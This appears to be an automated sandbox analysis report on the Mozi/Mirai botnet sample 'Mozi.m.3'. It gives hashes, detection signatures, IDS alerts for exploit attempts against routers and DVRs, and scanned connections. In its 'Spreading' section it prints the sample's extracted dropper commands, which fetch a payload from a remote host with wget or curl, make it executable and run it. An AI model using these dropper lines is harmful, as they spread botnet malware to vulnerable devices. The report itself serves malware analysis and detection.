Linux Analysis Report
Mozi.m.3

Overview

General Information

Sample Name: Mozi.m.3
Analysis ID: 562113
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Sample tries to persist itself using System V runlevels
Opens /proc/net/* files useful for finding connected devices and routers
Sample tries to persist itself using /etc/profile
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Uses known network protocols on non-standard ports
Found strings indicative of a multi-platform dropper
Sample reads /proc/mounts (often used for finding a writable filesystem)
Terminates several processes with shell command 'killall'
Writes ELF files to disk
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Writes HTML files containing JavaScript to disk
Sample contains strings that are potentially command strings
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

AV Detection

Source: Mozi.m.3 Avira: detected
Source: Mozi.m.3 Virustotal: Detection: 65%
Source: Mozi.m.3 Metadefender: Detection: 68%
Source: Mozi.m.3 ReversingLabs: Detection: 75%
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau

Spreading

Source: /tmp/Mozi.m.3 (PID: 5234) Opens: /proc/net/route
Source: Mozi.m.3 String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m.3 String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m.3 String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.12.dr String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: networks.12.dr String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: networks.12.dr String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'

Networking

Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47852 -> 201.49.46.204:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47852 -> 201.49.46.204:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41138 -> 176.32.230.19:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41138 -> 176.32.230.19:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:37034 -> 173.249.33.238:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:37034 -> 173.249.33.238:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33768 -> 201.20.107.209:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33768 -> 201.20.107.209:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:50306 -> 23.11.243.9:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:50306 -> 23.11.243.9:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.11.243.9:80 -> 192.168.2.23:50306
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54856 -> 81.108.37.251:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.1.122.127:80 -> 192.168.2.23:55982
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48454 -> 186.219.131.213:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.57.42.173:80 -> 192.168.2.23:54054
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48454 -> 186.219.131.213:80
Source: Traffic Snort IDS: 2024915 ET EXPLOIT Possible Vacron NVR Remote Command Execution 192.168.2.23:58926 -> 34.120.140.43:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:47780 -> 104.116.174.45:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:47780 -> 104.116.174.45:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.116.174.45:80 -> 192.168.2.23:47780
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:40214 -> 38.86.17.103:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 152.89.62.52:30301 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.193.239:8000 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 174.84.184.69:11211 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 109.164.113.203:5060 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41594 -> 173.223.178.190:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41594 -> 173.223.178.190:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 173.223.178.190:80 -> 192.168.2.23:41594
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:41494 -> 63.33.145.170:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:41494 -> 63.33.145.170:80
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 61.3.148.76:18606 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.93.89:1900 -> 192.168.2.23:4000
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46626 -> 162.209.132.128:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46626 -> 162.209.132.128:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34362 -> 148.229.1.12:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60110 -> 205.198.160.107:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60110 -> 205.198.160.107:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49554 -> 45.131.208.158:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49554 -> 45.131.208.158:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45688 -> 104.25.119.143:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46790 -> 171.25.175.236:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45688 -> 104.25.119.143:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46790 -> 171.25.175.236:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33654 -> 13.35.5.125:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39960 -> 23.58.36.209:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33654 -> 13.35.5.125:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52420 -> 54.173.33.241:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52420 -> 54.173.33.241:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39960 -> 23.58.36.209:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.58.36.209:80 -> 192.168.2.23:39960
Source: Traffic Snort IDS: 2025884 ET EXPLOIT Multiple CCTV-DVR Vendors RCE 192.168.2.23:35686 -> 67.87.4.136:81
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:36530 -> 185.115.61.29:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:36530 -> 185.115.61.29:8080
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:37138 -> 209.126.16.48:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:33922 -> 83.240.213.6:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:33922 -> 83.240.213.6:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33508 -> 23.6.123.60:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33508 -> 23.6.123.60:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.6.123.60:80 -> 192.168.2.23:33508
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:36280 -> 1.9.218.126:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44592 -> 154.209.180.104:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44592 -> 154.209.180.104:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60432 -> 154.215.209.203:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60432 -> 154.215.209.203:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33924 -> 188.215.82.71:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41576 -> 212.57.43.71:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33924 -> 188.215.82.71:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41190 -> 104.24.158.33:8080
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46150 -> 130.107.153.243:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46150 -> 130.107.153.243:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:43756 -> 154.208.73.98:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50894 -> 178.32.54.199:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50894 -> 178.32.54.199:80
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35956 -> 23.44.16.109:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35956 -> 23.44.16.109:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.16.109:80 -> 192.168.2.23:35956
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:45318 -> 198.50.31.71:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:45318 -> 198.50.31.71:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:57410 -> 23.201.48.195:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:57410 -> 23.201.48.195:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.201.48.195:80 -> 192.168.2.23:57410
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38758 -> 114.142.213.80:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38758 -> 114.142.213.80:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:50994 -> 85.159.236.201:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:49740 -> 3.66.12.202:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:49740 -> 3.66.12.202:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:47786 -> 196.46.192.172:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:46580 -> 34.102.251.67:8080
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:46580 -> 34.102.251.67:8080
Source: Traffic Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58084 -> 87.17.124.195:80
Source: Traffic Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58084 -> 87.17.124.195:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41712 -> 52.177.218.245:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:59316 -> 60.254.146.28:80
Source: Traffic Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 60.254.146.28:80 -> 192.168.2.23:59316
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:46538 -> 192.126.238.185:80
Source: Traffic Snort IDS: 2034576 ET EXPLOIT Netgear DGN Remote Code Execution 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.23:41830 -> 174.136.32.221:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:51146 -> 95.171.44.71:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:51146 -> 95.171.44.71:80
Source: Traffic Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.23:60330 -> 37.28.170.140:80
Source: Traffic Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.23:60330 -> 37.28.170.140:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55812 -> 93.41.229.147:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:54054 -> 23.57.42.173:80
Source: Traffic Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.23:55982 -> 23.1.122.127:80
Source: unknown Network traffic detected: HTTP traffic on port 32814 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 45178 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35686 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 81 -> 35686
Source: unknown Network traffic detected: HTTP traffic on port 59450 -> 81
Source: global traffic TCP traffic: 192.168.2.23:56828 -> 144.50.58.60:81
Source: global traffic TCP traffic: 192.168.2.23:41554 -> 16.185.224.54:81
Source: global traffic TCP traffic: 192.168.2.23:60082 -> 49.30.95.191:37215
Source: global traffic TCP traffic: 192.168.2.23:58350 -> 160.111.162.219:8080
Source: global traffic TCP traffic: 192.168.2.23:49632 -> 182.28.59.175:8080
Source: global traffic TCP traffic: 192.168.2.23:46638 -> 152.225.18.120:49152
Source: global traffic TCP traffic: 192.168.2.23:42056 -> 32.23.240.199:8080
Source: global traffic TCP traffic: 192.168.2.23:42232 -> 83.44.15.163:8080
Source: global traffic TCP traffic: 192.168.2.23:39266 -> 173.184.209.182:81
Source: global traffic TCP traffic: 192.168.2.23:36660 -> 213.176.82.108:37215
Source: global traffic TCP traffic: 192.168.2.23:46094 -> 185.189.197.94:52869
Source: global traffic TCP traffic: 192.168.2.23:39130 -> 11.152.191.105:8080
Source: global traffic TCP traffic: 192.168.2.23:43716 -> 219.17.67.235:37215
Source: global traffic TCP traffic: 192.168.2.23:53316 -> 12.186.198.42:8080
Source: global traffic TCP traffic: 192.168.2.23:40416 -> 194.243.196.252:81
Source: global traffic TCP traffic: 192.168.2.23:36448 -> 96.17.16.68:8080
Source: global traffic TCP traffic: 192.168.2.23:32944 -> 112.176.104.27:37215
Source: global traffic TCP traffic: 192.168.2.23:37630 -> 178.182.207.142:5555
Source: global traffic TCP traffic: 192.168.2.23:51470 -> 133.193.211.115:37215
Source: global traffic TCP traffic: 192.168.2.23:53422 -> 6.42.96.227:37215
Source: global traffic TCP traffic: 192.168.2.23:38924 -> 154.44.206.244:8080
Source: global traffic TCP traffic: 192.168.2.23:56090 -> 40.217.232.105:52869
Source: global traffic TCP traffic: 192.168.2.23:57580 -> 131.239.170.174:49152
Source: global traffic TCP traffic: 192.168.2.23:43542 -> 2.176.99.42:7574
Source: global traffic TCP traffic: 192.168.2.23:52996 -> 189.232.159.133:49152
Source: global traffic TCP traffic: 192.168.2.23:43952 -> 126.68.225.175:81
Source: global traffic TCP traffic: 192.168.2.23:57672 -> 11.216.21.192:52869
Source: global traffic TCP traffic: 192.168.2.23:60434 -> 164.17.85.186:8080
Source: global traffic TCP traffic: 192.168.2.23:45776 -> 142.34.122.100:8080
Source: global traffic TCP traffic: 192.168.2.23:42756 -> 157.160.238.119:7574
Source: global traffic TCP traffic: 192.168.2.23:39974 -> 182.70.170.130:52869
Source: global traffic TCP traffic: 192.168.2.23:46428 -> 87.253.23.67:8443
Source: global traffic TCP traffic: 192.168.2.23:42444 -> 40.168.7.236:8080
Source: global traffic TCP traffic: 192.168.2.23:46920 -> 35.122.67.94:8080
Source: global traffic TCP traffic: 192.168.2.23:35208 -> 19.116.56.119:8080
Source: global traffic TCP traffic: 192.168.2.23:41388 -> 28.168.205.128:5555
Source: global traffic TCP traffic: 192.168.2.23:46810 -> 180.89.169.85:8080
Source: global traffic TCP traffic: 192.168.2.23:60502 -> 103.133.112.54:37215
Source: global traffic TCP traffic: 192.168.2.23:46798 -> 49.121.221.50:5555
Source: global traffic TCP traffic: 192.168.2.23:39856 -> 50.26.175.172:7574
Source: global traffic TCP traffic: 192.168.2.23:55124 -> 55.226.166.165:52869
Source: global traffic TCP traffic: 192.168.2.23:38808 -> 216.93.120.15:37215
Source: global traffic TCP traffic: 192.168.2.23:49802 -> 122.42.97.57:49152
Source: global traffic TCP traffic: 192.168.2.23:48480 -> 208.121.43.95:8080
Source: global traffic TCP traffic: 192.168.2.23:43660 -> 104.109.35.63:8443
Source: global traffic TCP traffic: 192.168.2.23:42678 -> 206.105.5.142:8443
Source: global traffic TCP traffic: 192.168.2.23:39712 -> 75.73.55.134:81
Source: global traffic TCP traffic: 192.168.2.23:56110 -> 141.226.112.48:5555
Source: global traffic TCP traffic: 192.168.2.23:33402 -> 34.69.23.176:37215
Source: global traffic TCP traffic: 192.168.2.23:34628 -> 90.26.83.230:8080
Source: global traffic TCP traffic: 192.168.2.23:43266 -> 2.200.21.111:52869
Source: global traffic TCP traffic: 192.168.2.23:55798 -> 9.219.58.246:49152
Source: global traffic TCP traffic: 192.168.2.23:52562 -> 179.28.189.224:52869
Source: global traffic TCP traffic: 192.168.2.23:49274 -> 137.195.163.37:8443
Source: global traffic TCP traffic: 192.168.2.23:56380 -> 162.6.132.254:8080
Source: global traffic TCP traffic: 192.168.2.23:36358 -> 112.65.113.89:8443
Source: global traffic TCP traffic: 192.168.2.23:45098 -> 110.90.55.169:81
Source: global traffic TCP traffic: 192.168.2.23:51500 -> 189.134.48.15:8080
Source: global traffic TCP traffic: 192.168.2.23:45834 -> 83.57.65.59:8080
Source: global traffic TCP traffic: 192.168.2.23:48840 -> 164.96.150.142:8080
Source: global traffic TCP traffic: 192.168.2.23:33918 -> 204.119.212.109:8080
Source: global traffic TCP traffic: 192.168.2.23:54498 -> 79.161.24.176:49152
Source: global traffic TCP traffic: 192.168.2.23:50678 -> 75.174.137.33:8080
Source: global traffic TCP traffic: 192.168.2.23:40166 -> 39.152.6.71:52869
Source: global traffic TCP traffic: 192.168.2.23:38230 -> 213.36.93.175:8443
Source: global traffic TCP traffic: 192.168.2.23:46058 -> 19.113.73.17:8080
Source: global traffic TCP traffic: 192.168.2.23:57428 -> 83.140.37.92:8080
Source: global traffic TCP traffic: 192.168.2.23:38954 -> 130.30.19.29:49152
Source: global traffic TCP traffic: 192.168.2.23:52052 -> 71.137.97.50:81
Source: global traffic TCP traffic: 192.168.2.23:39862 -> 117.145.74.225:7574
Source: global traffic TCP traffic: 192.168.2.23:56700 -> 138.175.204.158:5555
Source: global traffic TCP traffic: 192.168.2.23:35342 -> 195.86.16.208:8080
Source: global traffic TCP traffic: 192.168.2.23:55870 -> 200.115.122.89:37215
Source: global traffic TCP traffic: 192.168.2.23:47842 -> 76.99.198.96:81
Source: global traffic TCP traffic: 192.168.2.23:33144 -> 209.178.207.189:8080
Source: global traffic TCP traffic: 192.168.2.23:38184 -> 4.110.94.140:81
Source: global traffic TCP traffic: 192.168.2.23:55774 -> 123.55.16.248:37215
Source: global traffic TCP traffic: 192.168.2.23:54010 -> 103.166.153.117:5555
Source: global traffic TCP traffic: 192.168.2.23:41684 -> 174.101.66.69:8080
Source: global traffic TCP traffic: 192.168.2.23:54174 -> 31.253.153.1:8443
